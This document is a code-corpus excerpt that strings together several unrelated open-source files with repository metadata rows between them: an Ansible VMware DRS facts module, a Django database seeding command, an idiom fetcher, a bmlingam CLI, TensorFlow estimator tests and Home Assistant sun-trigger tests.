- DRS facts for the given cluster will be returned.
    - This is a required parameter if the C(datacenter) parameter is not provided.
datacenter:
description:
- Name of the datacenter.
- DRS facts for all the clusters from the given datacenter will be returned.
    - This is a required parameter if the C(cluster_name) parameter is not provided.
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = r'''
- name: Gather DRS facts about given Cluster
vmware_drs_rule_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
cluster_name: '{{ cluster_name }}'
delegate_to: localhost
register: cluster_drs_facts
- name: Gather DRS facts about all Clusters in given datacenter
vmware_drs_rule_facts:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter: '{{ datacenter_name }}'
delegate_to: localhost
register: datacenter_drs_facts
'''
RETURN = r'''
drs_rule_facts:
description: metadata about DRS rule from given cluster / datacenter
returned: always
type: dict
sample: {
"DC0_C0": [
{
"rule_affinity": false,
"rule_enabled": true,
"rule_key": 1,
"rule_mandatory": true,
"rule_name": "drs_rule_0001",
"rule_type": "vm_vm_rule",
"rule_uuid": "52be5061-665a-68dc-3d25-85cd2d37e114",
"rule_vms": [
"VM_65",
"VM_146"
]
},
],
"DC1_C1": [
{
"rule_affine_host_group_name": "host_group_1",
"rule_affine_hosts": [
"10.76.33.204"
],
"rule_anti_affine_host_group_name": null,
"rule_anti_affine_hosts": [],
"rule_enabled": true,
"rule_key": 1,
"rule_mandatory": false,
"rule_name": "vm_host_rule_0001",
"rule_type": "vm_host_rule",
"rule_uuid": "52687108-4d3a-76f2-d29c-b708c40dbe40",
"rule_vm_group_name": "test_vm_group_1",
"rule_vms": [
"VM_8916",
"VM_4010"
]
}
],
}
'''
try:
from pyVmomi import vim
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import vmware_argument_spec, PyVmomi, find_datacenter_by_name, get_all_objs
class VmwareDrsFactManager(PyVmomi):
def __init__(self, module):
super(VmwareDrsFactManager, self).__init__(module)
datacenter_name = self.params.get('datacenter', None)
if datacenter_name:
datacenter_obj = find_datacenter_by_name(self.content, datacenter_name=datacenter_name)
self.cluster_obj_list = []
if datacenter_obj:
folder = datacenter_obj.hostFolder
self.cluster_obj_list = get_all_objs(self.content, [vim.ClusterComputeResource], folder)
else:
self.module.fail_json(changed=False, msg="Datacenter '%s' not found" % datacenter_name)
cluster_name = self.params.get('cluster_name', None)
if cluster_name:
cluster_obj = self.find_cluster_by_name(cluster_name=cluster_name)
if cluster_obj is None:
self.module.fail_json(changed=False, msg="Cluster '%s' not found" % cluster_name)
else:
self.cluster_obj_list = [cluster_obj]
def get_all_from_group(self, group_name=None, cluster_obj=None, hostgroup=False):
"""
Return all VM / Host names using given group name
Args:
group_name: Rule name
cluster_obj: Cluster managed object
hostgroup: True if we want only host name from group
Returns: List of VM / Host names belonging to given group object
"""
obj_name_list = []
if not all([group_name, cluster_obj]):
return obj_name_list
for group in cluster_obj.configurationEx.group:
if group.name == group_name:
if not hostgroup and isinstance(group, vim.cluster.VmGroup):
obj_name_list = [vm.name for vm in group.vm]
break
elif hostgroup and isinstance(group, vim.cluster.HostGroup):
obj_name_list = [host.name for host in group.host]
break
return obj_name_list
@staticmethod
def normalize_vm_vm_rule_spec(rule_obj=None):
"""
Return human readable rule spec
Args:
rule_obj: Rule managed object
Returns: Dictionary with DRS VM VM Rule info
"""
if rule_obj is None:
return {}
return dict(rule_key=rule_obj.key,
rule_enabled=rule_obj.enabled,
rule_name=rule_obj.name,
rule_mandatory=rule_obj.mandatory,
rule_uuid=rule_obj.ruleUuid,
rule_vms=[vm.name for vm in rule_obj.vm],
rule_type="vm_vm_rule",
rule_affinity=True if isinstance(rule_obj, vim.cluster.AffinityRuleSpec) else False,
)
def normalize_vm_host_rule_spec(self, rule_obj=None, cluster_obj=None):
"""
Return human readable rule spec
Args:
rule_obj: Rule managed object
cluster_obj: Cluster managed object
Returns: Dictionary with DRS VM HOST Rule info
"""
if not all([rule_obj, cluster_obj]):
return {}
return dict(rule_key=rule_obj.key,
rule_enabled=rule_obj.enabled,
rule_name=rule_obj.name,
rule_mandatory=rule_obj.mandatory,
rule_uuid=rule_obj.ruleUuid,
rule_vm_group_name=rule_obj.vmGroupName,
rule_affine_host_group_name=rule_obj.affineHostGroupName,
rule_anti_affine_host_group_name=rule_obj.antiAffineHostGroupName,
rule_vms=self.get_all_from_group(group_name=rule_obj.vmGroupName,
cluster_obj=cluster_obj),
rule_affine_hosts=self.get_all_from_group(group_name=rule_obj.affineHostGroupName,
cluster_obj=cluster_obj,
hostgroup=True),
rule_anti_affine_hosts=self.get_all_from_group(group_name=rule_obj.antiAffineHostGroupName,
cluster_obj=cluster_obj,
hostgroup=True),
rule_type="vm_host_rule",
)
def gather_drs_rule_facts(self):
"""
Gather DRS rule facts about given cluster
Returns: Dictionary of clusters with DRS facts
"""
cluster_rule_facts = dict()
for cluster_obj in self.cluster_obj_list:
cluster_rule_facts[cluster_obj.name] = []
for drs_rule in cluster_obj.configuration.rule:
if isinstance(drs_rule, vim.cluster.VmHostRuleInfo):
cluster_rule_facts[cluster_obj.name].append(self.normalize_vm_host_rule_spec(rule_obj=drs_rule,
cluster_obj=cluster_obj))
else:
cluster_rule_facts[cluster_obj.name].append(self.normalize_vm_vm_rule_spec(rule_obj=drs_rule))
return cluster_rule_facts
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
datacenter=dict(type='str', required=False),
cluster_name=dict(type='str', required=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'datacenter'],
],
supports_check_mode=True,
)
vmware_drs_facts = VmwareDrsFactManager(module)
module.exit_json(changed=False, drs_rule_facts=vmware_drs_facts.gather_drs_rule_facts())
if __name__ == "__main__":
main()
| gpl-3.0 | -469,219,042,870,135,000 | 35.571429 | 122 | 0.546347 | false |
mesenev/movement_fefu | movement_app/management/commands/filldb.py | 2 | 2090 | import random
from django.core.management.base import BaseCommand
from movement_app.models import *
__author__ = 'komatsu'
def random_date(start, end):
"""
This function will return a random datetime between two datetime
objects.
"""
delta = end - start
int_delta = (delta.days * 24 * 60 * 60) + delta.seconds
random_second = random.randrange(int_delta)
return start + datetime.timedelta(seconds=random_second)
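# Illustrative call (the dates are arbitrary examples):
#   random_date(datetime.datetime(2020, 1, 1), datetime.datetime(2020, 12, 31))
# yields some datetime inside 2020; the exact value depends on the RNG state.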
sirnames = open('movement_app/management/sirnames').read().split()
names = open('movement_app/management/names').read().split()
d2 = datetime.datetime.now() - datetime.timedelta(365)
def proper_v(int1, int2):
a, b = int1, int2
return a, b
class Command(BaseCommand):
help = 'Fill both users and userinfo dbs with records'
def handle(self, *args, **options):
for i in range(100):
a = random.choice(sirnames)
b = random.choice(names)
user = User(
password='111',
username=a + b + str(i),
first_name=b,
last_name=a,
is_staff=0
)
user.save()
a, b = proper_v(random.randrange(1, 5), random.randrange(1, 4))
user_from = random.choice(DORM_LIST)
user_to = list(DORM_LIST)
user_to.remove(user_from)
qwe = random.sample(set(user_to), random.randrange(1, 5))
qwe = [str(i) for i in qwe]
user_to = '|'.join(qwe)
time = random_date(d2, datetime.datetime.now())
userinfo = UserInfo(
userfield=user,
is_female=random.choice([False, True]),
now=a,
want=b,
misc='blablabla',
user_from=user_from,
user_to=user_to,
phone_number=random.randint(10000000000, 99999999999),
uptime=time,
is_active=True,
is_succeed=False
)
print(time)
userinfo.save()
print(i) | mit | 5,191,440,878,712,828,000 | 28.041667 | 75 | 0.536842 | false |
wiki-ai/revscoring | revscoring/utilities/fetch_idioms.py | 1 | 2320 | """
``revscoring fetch_idioms -h``
::
Gets a list of English language idioms from en.wiktionary.org.
Usage:
fetch_idioms [--output=<path>]
[--verbose] [--debug]
Options:
-h --help Print this documentation
--output=<path> Path to a file to write the idioms
[default: <stdout>]
--verbose Print dots and stuff to note progress
--debug Print debug logging
"""
import logging
import re
import sys
import docopt
import mwapi
from .util import dump_observation
def main(argv=None):
args = docopt.docopt(__doc__, argv=argv)
logging.basicConfig(
level=logging.INFO if not args['--debug'] else logging.DEBUG,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
)
logging.getLogger('requests').setLevel(logging.WARNING)
if args['--output'] == "<stdout>":
output = sys.stdout
else:
output = open(args['--output'], 'w')
verbose = args['--verbose']
run(output, verbose)
def is_idiom(phrase):
"""
Checks if a phrase meets certain criteria to make it an idiom
"""
if re.match('Category:English|Citation:|Appendix:', phrase):
return False
# One word phrases
if re.match(r"^[\w\-\']+$", phrase):
return False
# Two-worded phrases
if re.match(r"^[\w\-\']+ [\w\-\']+$", phrase):
return False
# Similes
if 'as a' in phrase:
return False
return True
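# Illustrative behaviour of the checks above (phrases are arbitrary examples,
# not taken from the live category listing):
#   is_idiom("dog")              -> False  (single word)
#   is_idiom("hot dog")          -> False  (two-word phrase)
#   is_idiom("as busy as a bee") -> False  (simile containing "as a")
#   is_idiom("kick the bucket")  -> True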
def fetch():
session = mwapi.Session("https://en.wiktionary.org")
results = session.get(
action='query',
list='categorymembers',
cmtitle="Category:English idioms",
formatversion=2,
continuation=True)
idioms = []
for doc in results:
for page_doc in doc['query']['categorymembers']:
phrase = page_doc['title']
if not is_idiom(phrase):
continue
idioms.append(phrase)
return idioms
def run(output, verbose):
logger = logging.getLogger(__name__)
if verbose:
logger.info('Fetching idioms...')
idioms = fetch()
for idiom in idioms:
dump_observation(idiom, output)
| mit | -3,024,613,572,800,338,000 | 23.217391 | 69 | 0.552586 | false |
taku-y/bmlingam | bmlingam/commands/bmlingam_coeff.py | 1 | 5844 | # -*- coding: utf-8 -*-
"""Include functions used in command bin/bmlingam-coeff.
"""
# Author: Taku Yoshioka
# License: MIT
from argparse import ArgumentParser
import matplotlib.pyplot as plt
import numpy as np
from bmlingam import load_pklz, MCMCParams, infer_coef_posterior
def parse_args_bmlingam_coeff(args=None):
parser = ArgumentParser()
# Positional arguments
parser.add_argument('optmodel_file', type=str,
help='Optimal model file.')
    # Optional arguments
parser.add_argument('--plot_figure',
dest='is_plot_figure', action='store_true',
help="""If this option is choosen,
a plot of the posterior samples
will be plotted.""")
parser.add_argument('--no_plot_figure',
dest='is_plot_figure', action='store_false',
help="""If this option is choosen (default),
a plot of the posterior samples
will not be plotted.""")
parser.set_defaults(is_plot_figure=False)
parser.add_argument('--save_figure',
dest='is_save_figure', action='store_true',
help="""If this option is choosen (default),
a plot of the posterior samples
will be saved into a file.""")
parser.add_argument('--no_save_figure',
dest='is_save_figure', action='store_false',
help="""If this option is choosen,
a plot of the posterior samples
will not be saved.""")
parser.set_defaults(is_save_figure=True)
parser.add_argument('--save_posterior',
dest='is_save_posterior', action='store_true',
help="""If this option is choosen (default),
the posterior samples
will be saved into a file.""")
parser.add_argument('--no_save_posterior',
dest='is_save_posterior', action='store_false',
help="""If this option is choosen,
the posterior samples
will not be saved.""")
parser.set_defaults(is_save_posterior=True)
parser.add_argument('--figtype',
dest='fig_ext', type=str,
choices=['pdf', 'png'],
help="""Figure file type (pdf or png).
Default is png. """)
parser.set_defaults(fig_ext='png')
# Get default setting
default = MCMCParams()
parser.add_argument('--n_mcmc_samples',
default=default.n_mcmc_samples, type=int,
help="""The number of MCMC samples (after burn-in).
Default is {}.
""".format(default.n_mcmc_samples))
parser.add_argument('--n_burn',
default=default.n_burn, type=int,
help="""The number of burn-in samples in MCMC.
Default is {}.
""".format(default.n_burn))
parser.add_argument('--seed',
default=default.seed, type=int,
help="""Specify the seed of random number generator used in
posterior sampling by MCMC. Default is {}.
""".format(default.seed))
parser.add_argument('--seed_burn',
default=default.seed_burn, type=int,
help="""Specify the seed of random number generator used in
the burn-in period of posterior sampling.
Default is {}.
""".format(default.seed_burn))
args_ = parser.parse_args(args)
params = {
'optmodel_file': args_.optmodel_file,
'mcmc_params': MCMCParams(
n_mcmc_samples=args_.n_mcmc_samples,
n_burn=args_.n_burn,
seed=args_.seed,
seed_burn=args_.seed_burn,
),
'is_plot_figure': args_.is_plot_figure,
'is_save_figure': args_.is_save_figure,
'is_save_posterior': args_.is_save_posterior,
'fig_ext': ('.' + args_.fig_ext)
}
return params
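# Illustrative invocation of the command described in the module docstring
# (the .pklz file name is an arbitrary example):
#   $ bmlingam-coeff x1_x2.pklz --n_mcmc_samples 2000 --figtype pdf
# The returned ``params`` dict matches the keyword arguments that
# bmlingam_coeff() below expects.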
def bmlingam_coeff(
optmodel_file, mcmc_params, is_plot_figure, is_save_figure,
is_save_posterior, fig_ext):
"""Estimate posterior distribution of regression coefficient.
The bmlingam model is specified with optmodel_file.
"""
# Load optimal model info
print(optmodel_file)
optmodel = load_pklz(optmodel_file)
xs = optmodel['xs']
hparams = optmodel['hparams']
causality_str = optmodel['causality_str']
varnames = [optmodel['x1_name'], optmodel['x2_name']]
# Plot parameters
plot_figure = is_plot_figure or is_save_figure
show_plot = is_plot_figure
# Infer posterior
trace = infer_coef_posterior(xs, hparams, mcmc_params, varnames,
causality_str, 1, plot_figure, show_plot)
# Save plot
if is_save_figure:
fig_file = optmodel_file.replace('.pklz', fig_ext)
plt.savefig(fig_file)
        print('A figure of the distribution of the posterior samples ' +
'was saved as %s.' % fig_file)
# Save posterior samples (MCMC trace)
if is_save_posterior:
csv_file = optmodel_file.replace('.pklz', '.post.csv')
np.savetxt(csv_file, trace, delimiter=',')
print('Posterior samples was saved as %s.' % csv_file)
| mit | -4,117,505,851,537,802,000 | 39.303448 | 84 | 0.515914 | false |
girving/tensorflow | tensorflow/contrib/estimator/python/estimator/dnn_linear_combined_test.py | 12 | 8059 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for dnn_linear_combined.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import tempfile
import numpy as np
import six
from tensorflow.contrib.estimator.python.estimator import dnn_linear_combined
from tensorflow.contrib.estimator.python.estimator import head as head_lib
from tensorflow.python.estimator.canned import dnn_testing_utils
from tensorflow.python.estimator.canned import linear_testing_utils
from tensorflow.python.estimator.canned import prediction_keys
from tensorflow.python.estimator.export import export
from tensorflow.python.estimator.inputs import numpy_io
from tensorflow.python.feature_column import feature_column
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.summary.writer import writer_cache
def _dnn_only_estimator_fn(
hidden_units,
feature_columns,
model_dir=None,
label_dimension=1,
weight_column=None,
optimizer='Adagrad',
activation_fn=nn.relu,
dropout=None,
input_layer_partitioner=None,
config=None):
return dnn_linear_combined.DNNLinearCombinedEstimator(
head=head_lib.regression_head(
weight_column=weight_column, label_dimension=label_dimension,
# Tests in core (from which this test inherits) test the sum loss.
loss_reduction=losses.Reduction.SUM),
model_dir=model_dir,
dnn_feature_columns=feature_columns,
dnn_optimizer=optimizer,
dnn_hidden_units=hidden_units,
dnn_activation_fn=activation_fn,
dnn_dropout=dropout,
input_layer_partitioner=input_layer_partitioner,
config=config)
class DNNOnlyEstimatorEvaluateTest(
dnn_testing_utils.BaseDNNRegressorEvaluateTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
dnn_testing_utils.BaseDNNRegressorEvaluateTest.__init__(
self, _dnn_only_estimator_fn)
class DNNOnlyEstimatorPredictTest(
dnn_testing_utils.BaseDNNRegressorPredictTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
dnn_testing_utils.BaseDNNRegressorPredictTest.__init__(
self, _dnn_only_estimator_fn)
class DNNOnlyEstimatorTrainTest(
dnn_testing_utils.BaseDNNRegressorTrainTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
dnn_testing_utils.BaseDNNRegressorTrainTest.__init__(
self, _dnn_only_estimator_fn)
def _linear_only_estimator_fn(
feature_columns,
model_dir=None,
label_dimension=1,
weight_column=None,
optimizer='Ftrl',
config=None,
partitioner=None,
sparse_combiner='sum'):
return dnn_linear_combined.DNNLinearCombinedEstimator(
head=head_lib.regression_head(
weight_column=weight_column, label_dimension=label_dimension,
# Tests in core (from which this test inherits) test the sum loss.
loss_reduction=losses.Reduction.SUM),
model_dir=model_dir,
linear_feature_columns=feature_columns,
linear_optimizer=optimizer,
input_layer_partitioner=partitioner,
config=config,
linear_sparse_combiner=sparse_combiner)
class LinearOnlyEstimatorEvaluateTest(
linear_testing_utils.BaseLinearRegressorEvaluationTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
linear_testing_utils.BaseLinearRegressorEvaluationTest.__init__(
self, _linear_only_estimator_fn)
class LinearOnlyEstimatorPredictTest(
linear_testing_utils.BaseLinearRegressorPredictTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
linear_testing_utils.BaseLinearRegressorPredictTest.__init__(
self, _linear_only_estimator_fn)
class LinearOnlyEstimatorTrainTest(
linear_testing_utils.BaseLinearRegressorTrainingTest, test.TestCase):
def __init__(self, methodName='runTest'): # pylint: disable=invalid-name
test.TestCase.__init__(self, methodName)
linear_testing_utils.BaseLinearRegressorTrainingTest.__init__(
self, _linear_only_estimator_fn)
class DNNLinearCombinedEstimatorIntegrationTest(test.TestCase):
def setUp(self):
self._model_dir = tempfile.mkdtemp()
def tearDown(self):
if self._model_dir:
writer_cache.FileWriterCache.clear()
shutil.rmtree(self._model_dir)
def _test_complete_flow(
self, train_input_fn, eval_input_fn, predict_input_fn, input_dimension,
label_dimension, batch_size):
linear_feature_columns = [
feature_column.numeric_column('x', shape=(input_dimension,))]
dnn_feature_columns = [
feature_column.numeric_column('x', shape=(input_dimension,))]
feature_columns = linear_feature_columns + dnn_feature_columns
est = dnn_linear_combined.DNNLinearCombinedEstimator(
head=head_lib.regression_head(label_dimension=label_dimension),
linear_feature_columns=linear_feature_columns,
dnn_feature_columns=dnn_feature_columns,
dnn_hidden_units=(2, 2),
model_dir=self._model_dir)
# TRAIN
num_steps = 10
est.train(train_input_fn, steps=num_steps)
    # EVALUATE
scores = est.evaluate(eval_input_fn)
self.assertEqual(num_steps, scores[ops.GraphKeys.GLOBAL_STEP])
self.assertIn('loss', six.iterkeys(scores))
# PREDICT
predictions = np.array([
x[prediction_keys.PredictionKeys.PREDICTIONS]
for x in est.predict(predict_input_fn)
])
self.assertAllEqual((batch_size, label_dimension), predictions.shape)
# EXPORT
feature_spec = feature_column.make_parse_example_spec(feature_columns)
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
export_dir = est.export_savedmodel(tempfile.mkdtemp(),
serving_input_receiver_fn)
self.assertTrue(gfile.Exists(export_dir))
def test_numpy_input_fn(self):
"""Tests complete flow with numpy_input_fn."""
label_dimension = 2
batch_size = 10
data = np.linspace(0., 2., batch_size * label_dimension, dtype=np.float32)
data = data.reshape(batch_size, label_dimension)
# learn y = x
train_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
num_epochs=None,
shuffle=True)
eval_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
y=data,
batch_size=batch_size,
shuffle=False)
predict_input_fn = numpy_io.numpy_input_fn(
x={'x': data},
batch_size=batch_size,
shuffle=False)
self._test_complete_flow(
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
predict_input_fn=predict_input_fn,
input_dimension=label_dimension,
label_dimension=label_dimension,
batch_size=batch_size)
if __name__ == '__main__':
test.main()
| apache-2.0 | -3,234,208,295,958,200,300 | 34.502203 | 80 | 0.70232 | false |
miniconfig/home-assistant | tests/components/automation/test_sun.py | 7 | 14025 | """The tests for the sun automation."""
from datetime import datetime
import unittest
from unittest.mock import patch
from homeassistant.core import callback
from homeassistant.setup import setup_component
from homeassistant.components import sun
import homeassistant.components.automation as automation
import homeassistant.util.dt as dt_util
from tests.common import (
fire_time_changed, get_test_home_assistant, mock_component)
# pylint: disable=invalid-name
class TestAutomationSun(unittest.TestCase):
"""Test the sun automation."""
def setUp(self):
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
mock_component(self.hass, 'group')
mock_component(self.hass, 'sun')
self.calls = []
@callback
def record_call(service):
"""Call recorder."""
self.calls.append(service)
self.hass.services.register('test', 'automation', record_call)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_sunset_trigger(self):
"""Test the sunset trigger."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T02:00:00Z',
})
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunset',
},
'action': {
'service': 'test.automation',
}
}
})
automation.turn_off(self.hass)
self.hass.block_till_done()
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
with patch('homeassistant.util.dt.utcnow',
return_value=now):
automation.turn_on(self.hass)
self.hass.block_till_done()
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_sunrise_trigger(self):
"""Test the sunrise trigger."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 14, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunrise',
},
'action': {
'service': 'test.automation',
}
}
})
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_sunset_trigger_with_offset(self):
"""Test the sunset trigger with offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T02:00:00Z',
})
now = datetime(2015, 9, 15, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 2, 30, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunset',
'offset': '0:30:00'
},
'action': {
'service': 'test.automation',
'data_template': {
'some':
'{{ trigger.%s }}' % '}} - {{ trigger.'.join((
'platform', 'event', 'offset'))
},
}
}
})
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
self.assertEqual('sun - sunset - 0:30:00', self.calls[0].data['some'])
def test_sunrise_trigger_with_offset(self):
"""Test the runrise trigger with offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
now = datetime(2015, 9, 13, 23, tzinfo=dt_util.UTC)
trigger_time = datetime(2015, 9, 16, 13, 30, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.utcnow',
return_value=now):
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'sun',
'event': 'sunrise',
'offset': '-0:30:00'
},
'action': {
'service': 'test.automation',
}
}
})
fire_time_changed(self.hass, trigger_time)
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_before(self):
"""Test if action was before."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'before': 'sunrise',
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 10, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_after(self):
"""Test if action was after."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunrise',
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 13, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_before_with_offset(self):
"""Test if action was before offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'before': 'sunrise',
'before_offset': '+1:00:00'
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 15, 1, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_after_with_offset(self):
"""Test if action was after offset."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T14:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunrise',
'after_offset': '+1:00:00'
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 14, 59, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_before_and_after_during(self):
"""Test if action was before and after during."""
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_RISING: '2015-09-16T10:00:00Z',
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T15:00:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunrise',
'before': 'sunset'
},
'action': {
'service': 'test.automation'
}
}
})
now = datetime(2015, 9, 16, 9, 59, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 15, 1, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
now = datetime(2015, 9, 16, 12, tzinfo=dt_util.UTC)
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(1, len(self.calls))
def test_if_action_after_different_tz(self):
"""Test if action was after in a different timezone."""
import pytz
self.hass.states.set(sun.ENTITY_ID, sun.STATE_ABOVE_HORIZON, {
sun.STATE_ATTR_NEXT_SETTING: '2015-09-16T17:30:00Z',
})
setup_component(self.hass, automation.DOMAIN, {
automation.DOMAIN: {
'trigger': {
'platform': 'event',
'event_type': 'test_event',
},
'condition': {
'condition': 'sun',
'after': 'sunset',
},
'action': {
'service': 'test.automation'
}
}
})
# Before
now = datetime(2015, 9, 16, 17, tzinfo=pytz.timezone('US/Mountain'))
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
self.hass.block_till_done()
self.assertEqual(0, len(self.calls))
# After
now = datetime(2015, 9, 16, 18, tzinfo=pytz.timezone('US/Mountain'))
with patch('homeassistant.util.dt.now',
return_value=now):
self.hass.bus.fire('test_event')
